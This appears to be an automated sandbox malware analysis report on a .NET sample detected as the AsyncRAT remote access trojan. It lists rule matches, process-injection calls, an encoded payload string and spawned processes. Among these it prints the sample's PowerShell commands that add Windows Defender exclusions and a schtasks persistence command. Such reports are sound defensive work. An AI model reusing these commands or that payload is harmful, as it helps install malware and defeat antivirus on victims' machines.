                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a651c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                .NET source code contains very large strings
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _292hYu8ukdHPubgdib9ttErYEcP.csLong String: Length: 46432
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _292hYu8ukdHPubgdib9ttErYEcP.csLong String: Length: 138368
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A48 NtSetContextThread,0_2_04C18A48
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A60 NtResumeThread,0_2_04C18A60
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A18 NtUnmapViewOfSection,0_2_04C18A18
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A24 NtAllocateVirtualMemory,0_2_04C18A24
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A30 NtWriteVirtualMemory,0_2_04C18A30
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C1B898 NtSetContextThread,0_2_04C1B898
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C1B9C8 NtResumeThread,0_2_04C1B9C8
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C1B1D0 NtUnmapViewOfSection,0_2_04C1B1D0
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C18A54 NtSetContextThread,0_2_04C18A54
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C1B270 NtAllocateVirtualMemory,0_2_04C1B270
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C1B338 NtWriteVirtualMemory,0_2_04C1B338
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_004FD8740_2_004FD874
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_004FD9B00_2_004FD9B0
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_00E36A200_2_00E36A20
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_00E36A110_2_00E36A11
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C17F300_2_04C17F30
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C17A280_2_04C17A28
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C19B580_2_04C19B58
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C17F200_2_04C17F20
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C191D10_2_04C191D1
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeCode function: 0_2_04C19B480_2_04C19B48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AE3901_2_029AE390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A96C81_2_029A96C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A46F81_2_029A46F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AD5C81_2_029AD5C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A19501_2_029A1950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A4E5A1_2_029A4E5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A8DF81_2_029A8DF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029A8AB01_2_029A8AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_029AFAF81_2_029AFAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_062700851_2_06270085
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D0B4903_2_00D0B490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00D0B4703_2_00D0B470
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B4B4A06_2_04B4B4A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B4B4906_2_04B4B490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A6B49010_2_04A6B490
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04A6B47010_2_04A6B470
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08AD3AA010_2_08AD3AA0
                Source: C:\Users\user\XClient.exeCode function: 19_2_01390BC019_2_01390BC0
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020978004.0000000004F30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2017370439.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020842068.0000000004CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMevlana.dll0 vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMevlana.dll0 vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000000.2005244191.000000000059C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametARHzD vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeBinary or memory string: OriginalFilenametARHzD vs 80c619d931fa4e5c89fe87aac0b6b143.exe
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6cf8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a6128.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.28a651c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2020202882.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000002.2020202882.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000001.00000002.4466712602.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, PlIPHG58P41.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, R1oFIDa6Sxp.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, R1oFIDa6Sxp.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.4ca0000.7.raw.unpack, ControlLayout.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2876fb0.2.raw.unpack, ControlLayout.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _292hYu8ukdHPubgdib9ttErYEcP.csBase64 encoded string: 'hE2QykcQ9IwIODs6Cao9WAclN3FLXwxm8F8oDlDfiT9ONLSW+jFmsfBfKA5Q34k/8F8oDlDfiT/wXygOUN+JP/BfKA5Q34k/8F8oDlDfiT9F8pRr90siyzwF5lfKSQzm8uP12bubU+2YoFykcxzOoMA1hf0meXcZ6HHS2gG8XQ9xUvwgrMZlF9MTai5L0zwiybepK1QePudc14kZe+d/xSPpFLHFl5B+SXuiMoa2So89ehYQV59JQmZYHwYTbgrPXJhsGqGojmwS7fVFejzXuKC3YD6y7ejH8F8oDlDfiT/K8PVmmv7KRkFnSfy2wB/Al0PkFcAlu616ZNSR/6VHs3e6SbjOEjjsCDg7OgmqPVgTAgYkj021pnpk1JH/pUezCpUFdCUA1GPr+RkFGe1bwMUBcvl5vqzcDPR6byT4lxVWhnEKDmgPOfBfKA5Q34k/jGSFYv84i+LymoeHOnAGB/lQH7E3/C/f8F8oDlDfiT/wXygOUN+JP/BfKA5Q34k/IkBP6uS9aKZIzh0f51yW3gl0CpCnser88F8oDlDfiT/wXygOUN+JP/BfKA5Q34k/8F8oDlDfiT/wXygOUN+JP/BfKA5Q34k/HfCU651lRNO8hxkyKfTw9PBfKA5Q34k/j3fdrJcSQuzwXygOUN+JP7AwPBXHYjRmOeO4S5PLRzdrhalv94P2LOfeQmaJBrJGztxuwSV4DybwXygOUN+JP9101dXrru9oyTT8wUc4R7wUoz3mlzPFukFnSfy2wB/Az66ER3y5sA/wXygOUN+JP/BfKA5Q34k//cIsT+/aFdHKMnt2i+Hs/E41L5bkDAYUXdeFhFfxkFRLQoDo3RNNW/BfKA5Q34k/8F8oDlDfiT+89qrx9XVSd/BfKA5Q34k/8F8oDlDfiT/zM3QAis5bI8i6E1HBZ6QUWHtV8aHJmfmH/0w0t/V8Gp+aOf9GhW67Y4u7TwUlo8BMIWxQgp1v0fBfKA5Q34k/8F8oDlDfiT/wXygOUN+JP/BfKA5Q34k/8F8oDlDfiT/wXygOUN+JP+p4Tw7eyAxRojcUQneVJwVE9nt5KYo+L7LRtQdRrxx4pnJXp7mFWFFBlBbfImzLnCese1TXlti4thell4Abik0Ry70dRqVxhTqODeq4rYcNRgwyOUDS2Q8RzgyrdO8BTx6dHZTtrHb2Z7E/+z41DqX6kYiWE9RUC3t90yptdlAIRPZ7eSmKPi+y0bUHUa8cePyqEL1zNo1j/chMQy8sXMwnrHtU15bYuLYXpZeAG4pNPNmjkWcsuWcrOuy6j4uE4fi+DgBGL/W3AaahEScQ1siwn9gb4WF9wC4VePK6gUrJwPf7WRWyKTidzkM6xB23TCqIl/+6WqRYJQnh47Vj+nLh+ZCVCo3+bi6QGrjIb/rmA8xGrHsvAtPwXygOUN+JP9HCcshYP9kIArwjXe/UBjrNSXbGklRwD0q8LZXig5Y85ZovnEYZQVzlCFfcaa8gNRqimpdU0v/9aXj2eGl3dzncH/GHRAgw0QYrtJAWw16/q2yPfMFgjqzwNSENDX2p/sueKuh1kXWbjpLrfCoopACkVP39KquYSFFeR425boRDIMz5aCyGp9OrD3Zu8V91VaV4Jm5qEDeilZbwcrQuhFPJtbx306FUf2r6wqRYBpIuljLVV0FRQcwl0xUyOOXbh5aMF/iQiLLAYzHVj6TZV8eQ3NGFDLNb5U2mnsU6HQ4odfNbpUE6ukUyd7WO/XLRShI+435wtm/S9rH1IWi9w4RddHjA5fsNW5Pym5Nu1/CkGR8iZReOBAPFVNZxoQESS4Z63WoOQcopIG0wtjLY4NoZHyJlF44EA1g0aEY0sH7NMm9CrnynBwJutFM53MgK2R7K9lRhyCLZqV9CPUbDPe9ZLFClMV1GQJxTWLhiv0bUmgxyc1nLu83wXygOUN+JPxBF15DChDXzGtM/Y6ZGwG3QY2NXP03NH7O2AyCdAB1KAcDhrVS/j9esL4JunqMUW/yhefWaqK0E9lLYeWIeo+y/0kWhKAKv5JEB7Bnx7JAdcsK0bLyeo5UvGOh6pGE+iKM3P9ZZ8S+7SzdV1BWjyerJiz3J6lioI0nhouV6OvB7lZwa46EvYgctXj2BupjQL7Bnwh5yGQdsajO2SHA3tYdrrGiOiEB6ctGH1yBhctXM5NkKpYuJYMON2O9yKnIvOa0IXpd6P4LCRrhStG2dbN1kG+RP2KSiMwVsAlwwTJsW2+5z7Onvd21lW6bXDKNU+7kQ9ohoIr779kcrozUO/9jInLQ97XjgWtXlM+lUy03ljihmEkmeuTYObBkIvlr0T7lTUnZqqqQxZarFiGgU4abVIxO1pQy0vsah3s6eivphxJH9m8JSO2QDqiOCGkiwBQNALCntPZEAu1uMNvwGgGQDkB1fDeVfbaRU/f0qq5hIGDcvNBi1rIgeqGIF3LJ9nVOWbuPsbtAvEQlhI1HAO13qj/4XkKXRLD68ZlWQC0+UeCV8GKAQpM/ZK04/op0oSGzd777i20zwg3ES/47WF792tmTq+vTG8bRIAN1QdqgH/WDINu+ZJHW1Oaww6LRimYTP+SraVrNZ+95502KwjCwh44a1Nh0ZwQYDrIuoQgucz+tP0x7p5GgnleyTWwftnYoWPBSxh6zBaDa7QBJPSYPBdHOtgZfw4aYZvu00ULw1+PAQe0XnUAoE4zK4MnNKqaM8xqINur9QTrpbxWh+qEknleyTWwftnTvjwPyqsFd+uRogKopcQTGwE/kAYgh2HW/2Bj7Rkgh7UAIdVzB+UVm4cXIG8PMRSZLcruZe7ZVbBQmOlFi6DtG0pF+wpNYxwwEf8oEupvkjgYBqlSZSHU40yf9leJ6Hnxp+rD1s/5GUFc4aJYs7v61jKgE2GS+HV2NuwQ3lFXkJA74jkzpMYVLRqmwjuqL9bXrf7eInzEzC7aqxj4PLoVQ29JeOaXhHI1hkYEHQYywjPiv/HM2728Oz1giSF2sRv8m
                Source: classification engineClassification label: mal100.troj.evad.winEXE@31/29@2/2
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\80c619d931fa4e5c89fe87aac0b6b143.exe.logJump to behavior
                Source: C:\Users\user\XClient.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3396:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\B1pdFhZvNNv88cUw
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe "C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exe"
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe C:\Users\user\XClient.exe
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe "C:\Users\user\XClient.exe"
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe "C:\Users\user\XClient.exe"
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe C:\Users\user\XClient.exe
                Source: unknownProcess created: C:\Users\user\XClient.exe C:\Users\user\XClient.exe
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe C:\Users\user\XClient.exe
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\XClient.exe C:\Users\user\XClient.exe
                Source: C:\Users\user\XClient.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\XClient.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe"Jump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\80c619d931fa4e5c89fe87aac0b6b143.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
